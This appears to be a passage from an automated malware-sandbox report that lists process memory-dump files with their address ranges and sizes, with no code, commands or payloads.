                                                                                                                                              • memory/1196-276-0x0000000072E20000-0x00000000735D0000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                7.7MB

                                                                                                                                              • memory/1196-257-0x0000000000A70000-0x0000000000A84000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                80KB

                                                                                                                                              • memory/1400-295-0x0000000000400000-0x0000000000420000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                128KB

                                                                                                                                              • memory/1448-232-0x0000000005450000-0x0000000005A68000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                6.1MB

                                                                                                                                              • memory/1448-224-0x0000000000400000-0x000000000041E000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                120KB

                                                                                                                                              • memory/1448-229-0x0000000005570000-0x00000000055AC000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                240KB

                                                                                                                                              • memory/1448-226-0x0000000072E20000-0x00000000735D0000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                7.7MB

                                                                                                                                              • memory/1448-227-0x0000000005A70000-0x0000000006088000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                6.1MB

                                                                                                                                              • memory/1448-277-0x0000000005830000-0x000000000593A000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                1.0MB

                                                                                                                                              • memory/1448-228-0x0000000005510000-0x0000000005522000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                72KB

                                                                                                                                              • memory/1868-251-0x0000000000780000-0x000000000078E000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                56KB

                                                                                                                                              • memory/2016-179-0x0000000002F78000-0x0000000002FDD000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                404KB

                                                                                                                                              • memory/2016-213-0x0000000004800000-0x000000000489D000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                628KB

                                                                                                                                              • memory/2016-211-0x0000000002F78000-0x0000000002FDD000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                404KB

                                                                                                                                              • memory/2016-210-0x0000000000400000-0x0000000002CC4000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                40.8MB

                                                                                                                                              • memory/2028-271-0x0000000000B90000-0x0000000000BF0000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                384KB

                                                                                                                                              • memory/2028-269-0x00000000029B0000-0x00000000029B1000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/2088-313-0x0000000000400000-0x0000000000537000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                1.2MB

                                                                                                                                              • memory/2088-316-0x0000000000400000-0x0000000000537000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                1.2MB

                                                                                                                                              • memory/2088-327-0x0000000000400000-0x0000000000537000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                1.2MB

                                                                                                                                              • memory/2092-265-0x0000000002120000-0x0000000002180000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                384KB

                                                                                                                                              • memory/2216-317-0x0000000000400000-0x0000000000630000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                2.2MB

                                                                                                                                              • memory/2656-218-0x0000000001560000-0x0000000001576000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                88KB

                                                                                                                                              • memory/3156-192-0x00000000006A0000-0x00000000006A1000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/3168-187-0x000000006B280000-0x000000006B2A6000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                152KB

                                                                                                                                              • memory/3168-154-0x000000006FE40000-0x000000006FFC6000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                1.5MB

                                                                                                                                              • memory/3168-149-0x000000006B440000-0x000000006B4CF000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                572KB

                                                                                                                                              • memory/3168-150-0x000000006B440000-0x000000006B4CF000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                572KB

                                                                                                                                              • memory/3168-159-0x0000000000400000-0x000000000051D000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                1.1MB

                                                                                                                                              • memory/3168-157-0x0000000000400000-0x000000000051D000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                1.1MB

                                                                                                                                              • memory/3168-156-0x0000000000400000-0x000000000051D000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                1.1MB

                                                                                                                                              • memory/3168-158-0x0000000000400000-0x000000000051D000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                1.1MB

                                                                                                                                              • memory/3168-160-0x0000000000400000-0x000000000051D000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                1.1MB

                                                                                                                                              • memory/3168-155-0x000000006B280000-0x000000006B2A6000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                152KB

                                                                                                                                              • memory/3168-188-0x000000006FE40000-0x000000006FFC6000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                1.5MB

                                                                                                                                              • memory/3168-151-0x000000006FE40000-0x000000006FFC6000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                1.5MB

                                                                                                                                              • memory/3168-190-0x0000000064940000-0x0000000064959000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                100KB

                                                                                                                                              • memory/3168-161-0x0000000000400000-0x000000000051D000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                1.1MB

                                                                                                                                              • memory/3168-186-0x000000006B440000-0x000000006B4CF000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                572KB

                                                                                                                                              • memory/3168-148-0x000000006B440000-0x000000006B4CF000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                572KB

                                                                                                                                              • memory/3168-185-0x0000000000400000-0x000000000051D000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                1.1MB

                                                                                                                                              • memory/3168-152-0x000000006FE40000-0x000000006FFC6000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                1.5MB

                                                                                                                                              • memory/3168-153-0x000000006FE40000-0x000000006FFC6000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                1.5MB

                                                                                                                                              • memory/3292-310-0x00000000003E0000-0x0000000000400000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                128KB

                                                                                                                                              • memory/3404-248-0x0000000072E20000-0x00000000735D0000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                7.7MB

                                                                                                                                              • memory/3404-247-0x0000000000140000-0x0000000000160000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                128KB

                                                                                                                                              • memory/3516-217-0x0000000004D00000-0x0000000004D76000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                472KB

                                                                                                                                              • memory/3516-220-0x0000000004C80000-0x0000000004CF6000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                472KB

                                                                                                                                              • memory/3516-221-0x0000000004D80000-0x0000000004D9E000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                120KB

                                                                                                                                              • memory/3516-222-0x0000000005410000-0x00000000059B4000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                5.6MB

                                                                                                                                              • memory/3516-203-0x0000000072E20000-0x00000000735D0000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                7.7MB

                                                                                                                                              • memory/3516-204-0x0000000000390000-0x00000000003FA000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                424KB

                                                                                                                                              • memory/3688-182-0x0000000000400000-0x000000000046D000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                436KB

                                                                                                                                              • memory/3688-198-0x0000000000400000-0x000000000046D000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                436KB

                                                                                                                                              • memory/3692-278-0x00000000029E0000-0x00000000029E1000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/3692-260-0x00000000036B0000-0x00000000036B1000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/3692-288-0x00000000027D0000-0x00000000027D1000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/3692-286-0x00000000029F0000-0x00000000029F1000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/3692-285-0x0000000002A20000-0x0000000002A21000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/3692-284-0x00000000029B0000-0x00000000029B1000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/3692-259-0x00000000027C0000-0x00000000027C1000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/3692-258-0x0000000002440000-0x00000000024A0000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                384KB

                                                                                                                                              • memory/3692-283-0x00000000029C0000-0x00000000029C1000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/3692-282-0x0000000002A00000-0x0000000002A01000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/3692-279-0x0000000002990000-0x0000000002991000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/3848-341-0x0000000010000000-0x0000000010D56000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                13.3MB

                                                                                                                                              • memory/4004-267-0x00000000009D0000-0x0000000000A30000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                384KB

                                                                                                                                              • memory/4044-297-0x0000000000400000-0x0000000000420000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                128KB

                                                                                                                                              • memory/4112-208-0x0000000000400000-0x0000000002C68000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                40.4MB

                                                                                                                                              • memory/4112-205-0x0000000002CE8000-0x0000000002CF1000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                36KB

                                                                                                                                              • memory/4112-206-0x0000000002CA0000-0x0000000002CA9000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                36KB

                                                                                                                                              • memory/4112-175-0x0000000002CE8000-0x0000000002CF1000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                36KB

                                                                                                                                              • memory/4392-199-0x0000000001310000-0x0000000001312000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                8KB

                                                                                                                                              • memory/4392-189-0x0000000000BA0000-0x0000000000BD8000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                224KB

                                                                                                                                              • memory/4392-197-0x00007FF9034E0000-0x00007FF903FA1000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                10.8MB

                                                                                                                                              • memory/4504-261-0x0000000002460000-0x00000000024C0000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                384KB

                                                                                                                                              • memory/4680-268-0x0000000002490000-0x00000000024F0000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                384KB

                                                                                                                                              • memory/4724-252-0x0000000000520000-0x0000000000571000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                324KB

                                                                                                                                              • memory/4860-273-0x0000000000400000-0x000000000048C000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                560KB

                                                                                                                                              • memory/4860-274-0x00000000005E0000-0x0000000000624000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                272KB

                                                                                                                                              • memory/4860-270-0x00000000006AD000-0x00000000006D4000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                156KB

                                                                                                                                              • memory/4860-272-0x00000000006AD000-0x00000000006D4000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                156KB

                                                                                                                                              • memory/4904-281-0x0000000002FE0000-0x0000000002FE1000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/4904-262-0x0000000000F90000-0x0000000001144000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                1.7MB

                                                                                                                                              • memory/4904-255-0x0000000000BF0000-0x0000000000BF1000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/4904-280-0x00000000058C0000-0x00000000058C1000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/4904-287-0x0000000001270000-0x0000000001271000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/4904-250-0x0000000000F40000-0x0000000000F86000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                280KB

                                                                                                                                              • memory/4904-334-0x00000000769E0000-0x0000000076F93000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                5.7MB

                                                                                                                                              • memory/4904-350-0x0000000073800000-0x000000007384C000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                304KB

                                                                                                                                              • memory/4904-256-0x0000000075E40000-0x0000000076055000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                2.1MB

                                                                                                                                              • memory/4904-275-0x0000000000F90000-0x0000000001144000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                1.7MB

                                                                                                                                              • memory/4904-264-0x0000000000F90000-0x0000000001144000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                1.7MB

                                                                                                                                              • memory/4904-263-0x0000000000F90000-0x0000000001144000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                1.7MB

                                                                                                                                              • memory/4904-266-0x0000000073D10000-0x0000000073D99000-memory.dmp
                                                                                                                                                Filesize

                                                                                                                                                548KB